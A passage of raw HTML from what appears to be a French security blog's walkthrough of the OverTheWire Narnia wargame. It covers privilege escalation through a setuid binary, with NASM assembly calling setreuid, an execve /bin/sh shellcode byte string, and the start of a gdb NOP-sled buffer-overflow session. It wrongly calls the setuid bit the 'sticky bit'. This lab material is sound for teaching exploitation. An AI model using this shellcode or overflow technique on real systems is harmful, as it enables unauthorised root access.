data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h4 class=\"elementor-heading-title elementor-size-default\"><span data-token-index=\"0\" class=\"notion-enable-hover\">El\u00e9vation de privil\u00e8ges<\/span><\/h4>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f481668 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f481668\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7676b3b\" data-id=\"7676b3b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-93ffff5 elementor-widget elementor-widget-text-editor\" data-id=\"93ffff5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Afin de s\u2019\u00e9lever en privil\u00e8ges, on utilise le sticky bit.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-da18485 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"da18485\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-a2b4c5d\" data-id=\"a2b4c5d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d616b2c elementor-widget elementor-widget-text-editor\" data-id=\"d616b2c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Le <code>sticky bit<\/code> est pr\u00e9sent sur les fichiers qui s\u2019ex\u00e9cutent avec un autre utilisateur que l\u2019utilisateur courant.<\/p>\n<p>C\u2019est notamment utile pour les processus qui ont besoin temporairement des droits root.<\/p>\n<p>Cependant, il s\u2019agit d\u2019une pratique dangereuse car elle permet \u00e0 un attaquant d\u2019exploiter une faille du programme et d\u2019ainsi obtenir des acc\u00e8s privil\u00e9gi\u00e9s.<\/p>\n<p>C\u2019est ce nous allons tenter de faire dans ce challenge <img decoding=\"async\" class=\"emoji\" role=\"img\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/1f608.svg\" alt=\"\ud83d\ude08\" \/><\/p>\n<p>Pour s\u2019\u00e9lever en privil\u00e8ges gr\u00e2ce au sticky bit, on utilise la commande <code>setreuid()<\/code>.<\/p>\n<p><code>setreuid()<\/code> d\u00e9finit les identifiants r\u00e9els et effectifs du processus appelant.<\/p>\n<p>\u00a0<\/p>\n<blockquote>\n<p><em><strong>L\u2019ID r\u00e9el<\/strong> est la personne que l\u2019on est r\u00e9ellement et <strong>l\u2019ID effectif<\/strong> est celui qui permet au syst\u00e8me de nous autoriser ou non \u00e0 effectuer certaines actions.<\/em><\/p>\n<p><em>\u00a0<\/em><\/p>\n<\/blockquote>\n<p>On \u00e9crit donc un script ASM 32 bits faisant un appel (syscall) \u00e0 la fonction setreuid.<\/p>\n<p>\u00a0<\/p>\n<p>Pour <strong>trouver le num\u00e9ro d\u2019appel<\/strong>, il faut fouiller dans le fichier <code>\/usr\/include\/asm\/unistd_32.h<\/code> de la machine Narnia :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-594d72c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"594d72c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f63296f\" data-id=\"f63296f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-049073e elementor-widget elementor-widget-image\" data-id=\"049073e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"329\" height=\"157\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled-1.png\" class=\"attachment-large size-large wp-image-560\" alt=\"\" srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled-1.png 329w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled-1-300x143.png 300w\" sizes=\"(max-width: 329px) 100vw, 329px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-07e697a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"07e697a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-a7daf21\" data-id=\"a7daf21\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fe646dc elementor-widget elementor-widget-text-editor\" data-id=\"fe646dc\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Il s\u2019agit du num\u00e9ro d\u2019appel 70.<\/p>\n<p>Ensuite, il faut trouver quels arguments on doit configurer pour appeler la fonction.<\/p>\n<p>Ici nous avons 2 possibilit\u00e9s : celle d\u2019utiliser <code>getuid<\/code> ou celle de rentrer directement l\u2019ID dans le programme.<\/p>\n<p>La solution la plus simple est de rentrer directement l\u2019ID dans le programme.<\/p>\n<p>Sur ce site : <a href=\"https:\/\/faculty.nps.edu\/cseagle\/assembly\/sys_call.html\">https:\/\/faculty.nps.edu\/cseagle\/assembly\/sys_call.html<\/a>, vous trouverez tous les syscall, ainsi que leur arguments.<\/p>\n<p>\u00a0<\/p>\n<p>Ainsi, pour un programme assembleur 32 bits qui appelle la fonction <code>setreuid<\/code> pour l\u2019utilisateur <strong>narnia3<\/strong>, voici ce que \u00e7a donne :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-bb976d8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"bb976d8\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b411abe\" data-id=\"b411abe\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5536ca0 elementor-widget elementor-widget-code-highlight\" data-id=\"5536ca0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c line-numbers\">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>section .text\r\nglobal _start\r\n\t\r\n_start:\r\n\t; xor\r\n\txor eax, eax\r\n\txor ebx, ebx\r\n\t\r\n\t; setreuid(rid, eid);\r\n\txor eax, eax\r\n\t;rid\r\n\tmov bx, 14003   ; bx est le registre 16 bits de ebx\r\n\t;eid\r\n\tmov cx, 14003   ; cx est le registre 16 bits de ecx\r\n\tmov al, 70      ; al est le registre 8 bits de eax\r\n\tint 0x80        ; syscall<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-47cd71f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"47cd71f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-8b87432\" data-id=\"8b87432\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3f1205f elementor-widget elementor-widget-text-editor\" data-id=\"3f1205f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<blockquote>\n<p><em>14003 est l\u2019id de narnia3, on le configure 2 fois : pour l\u2019id <b>effectif et r\u00e9el<\/b>.<\/em><\/p>\n<\/blockquote>\n<p>Le fait d\u2019utiliser les registres <code>bx<\/code> et <code>cx<\/code> permet d\u2019\u00e9viter d\u2019avoir des z\u00e9ros dans le shellcode.<\/p>\n<p>\u00a0<\/p>\n<p>Pour rappel, voici les diff\u00e9rents registres, ainsi que leur taille :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-fb0978f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"fb0978f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-8a93be9\" data-id=\"8a93be9\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3ffa0db elementor-widget elementor-widget-image\" data-id=\"3ffa0db\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"591\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/registers-size.png\" class=\"attachment-large size-large wp-image-561\" alt=\"\" srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/registers-size.png 720w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/registers-size-300x246.png 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d58f9bb elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d58f9bb\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-879fe09\" data-id=\"879fe09\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-eb4387a elementor-widget elementor-widget-text-editor\" data-id=\"eb4387a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<blockquote>\n<p><em>Il est important de tenir compte de la taille de la donn\u00e9e \u00e0 stocker afin de choisir le registre le plus adapt\u00e9. Cela permet notamment d\u2019\u00e9viter d\u2019avoir des 0 au milieu du shellcode, emp\u00eachant son fonctionnement.<\/em><\/p>\n<\/blockquote>\n<p>Il faut ensuite r\u00e9p\u00e9ter l\u2019op\u00e9ration pour la fonction <code>execve<\/code> et la fonction <code>exit<\/code>.<\/p>\n<p>Vous pouvez vous inspirer de cet exemple afin de r\u00e9diger cette seconde partie :<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/43716\">https:\/\/www.exploit-db.com\/exploits\/43716<\/a><\/p>\n<h4><strong>Formatage<\/strong><\/h4>\n<p>&nbsp;<\/p>\n<p>Une fois votre code termin\u00e9, ex\u00e9cuter la commande <code>nasm<\/code> afin de le compiler :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-75febe6 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"75febe6\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-de15188\" data-id=\"de15188\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-bd72102 elementor-widget elementor-widget-code-highlight\" data-id=\"bd72102\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>nasm -f elf32 shellcode.s<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d86b228 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d86b228\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-3ce039a\" data-id=\"3ce039a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ac1f458 elementor-widget elementor-widget-text-editor\" data-id=\"ac1f458\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Puis, regarder la sortie de la commande :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-c5372e8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"c5372e8\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7c4cb22\" data-id=\"7c4cb22\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8e3fc83 elementor-widget elementor-widget-code-highlight\" data-id=\"8e3fc83\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>objdump -d shellcode.o <\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9f0596d elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9f0596d\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d178a31\" data-id=\"d178a31\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-957ae5d elementor-widget elementor-widget-text-editor\" data-id=\"957ae5d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>R\u00e9cup\u00e9rez la deuxi\u00e8me colonne, qui contient le code en hexad\u00e9cimal et formatez le afin d\u2019obtenir un shellcode de ce format l\u00e0 :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-bb0646a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"bb0646a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2254c21\" data-id=\"2254c21\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f112c8a elementor-widget elementor-widget-code-highlight\" data-id=\"f112c8a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp> \"\\xb0\\x0b\\x99\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\x89\\xe1\\xcd\\x80\"<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-8a1ae1f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"8a1ae1f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7576b13\" data-id=\"7576b13\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5170244 elementor-widget elementor-widget-heading\" data-id=\"5170244\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h3 class=\"elementor-heading-title elementor-size-default\">Debug<\/h3>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-b13bd23 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"b13bd23\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-65ba8f0\" data-id=\"65ba8f0\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8b53bd0 elementor-widget elementor-widget-text-editor\" data-id=\"8b53bd0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Avant de tester que votre shellcode fonctionne, vous devez trouver l\u2019adresse de retour.<\/p>\n<p>Cette adresse se situera \u00e0 la fin de l\u2019injection. Alors que l\u2019injection remplira l\u2019enti\u00e8ret\u00e9 de la pile, l\u2019adresse de retour sera inscrite sur le registre EIP. Ce registre permet de connaitre o\u00f9 se trouve la prochaine instruction.<\/p>\n<p>Ainsi, d\u00e8s que EIP sera lu, notre code sera ex\u00e9cut\u00e9.<\/p>\n<p>Pour d\u00e9terminer l\u2019adresse de retour, nous pouvons utiliser de nouveau\u00a0<code>peda-gdb<\/code>.<\/p>\n<p>\u00a0<\/p>\n<p>Commen\u00e7ons par lancer l\u2019utilitaire :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9d37c56 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9d37c56\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d90d7b8\" data-id=\"d90d7b8\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d0c3522 elementor-widget elementor-widget-code-highlight\" data-id=\"d0c3522\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>file \/narnia\/narnia2<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-fbe9448 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"fbe9448\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-394e41e\" data-id=\"394e41e\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6ac34f6 elementor-widget elementor-widget-text-editor\" data-id=\"6ac34f6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Configurons des arguments :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-42efedf elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"42efedf\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-784176a\" data-id=\"784176a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-610989b elementor-widget elementor-widget-code-highlight\" data-id=\"610989b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>set args $(python2 -c 'print(\"\\x90\"*150)')<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-de51068 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"de51068\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2fa3b12\" data-id=\"2fa3b12\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-101d03c elementor-widget elementor-widget-text-editor\" data-id=\"101d03c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Cet argument permet d\u2019afficher 150 caract\u00e8res <code>\\x90<\/code>, autrement dit \u201c<strong>NOP<\/strong>\u201d, ce qui signifie \u201c<strong>No Operation<\/strong>\u201d en assembleur.<\/p>\n<p>\u00a0<\/p>\n<p>Ajoutons un <strong>breakpoint<\/strong>, pour pouvoir faire d\u00e9filer tranquillement le programme et voir ce qu\u2019il s\u2019y passe :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-ff058e9 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ff058e9\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-04ddf1d\" data-id=\"04ddf1d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6685a8e elementor-widget elementor-widget-code-highlight\" data-id=\"6685a8e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code 